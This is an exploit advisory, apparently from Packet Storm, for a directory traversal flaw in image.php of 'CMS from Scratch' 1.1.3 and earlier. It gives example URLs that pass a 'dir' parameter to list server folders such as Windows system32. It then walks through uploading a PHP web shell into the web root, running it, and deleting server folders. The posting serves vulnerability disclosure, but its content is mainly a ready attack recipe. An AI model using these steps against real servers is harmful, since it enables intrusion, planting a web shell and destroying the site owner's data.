CMS from Scratch versions 1.1.3 and below suffer from a directory traversal vulnerability in image.php.
1e43ee740d022518e2dd23dad1963f5f------------------------------------------------------------------------
CMS from Scratch <= 1.1.3 (image.php) Local Directory Traversal Vulnerability
------------------------------------------------------------------------
author...: Stack
mail.....: Wanted
wanted by Egix
Gr33ts t0 : EgiX, ThE GeNeRal L0s3r , Houssamix ,Str0ke <==> special THanks to EgiX For founded it :d:)
Exploit :
# http://localhost/path/cms/images.php?dir=c:
Example :
# http://localhost/path/cms/images.php?dir=c:WINDOWS/system32/
Exploit 2 :
and you can upload php file ==> php shell
for example upload the php shell in my localhost
c:AppServ/www/
you go to link
# http://localhost/path/cms/images.php?dir=c:AppServ/www/
after click to colon [parcourir] after select your shell and click upload
and go to link
# http://localhost/shell.php
desc :you can delete all folder of server
just clike to mark delete in folder selected to delete
thx : allah
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!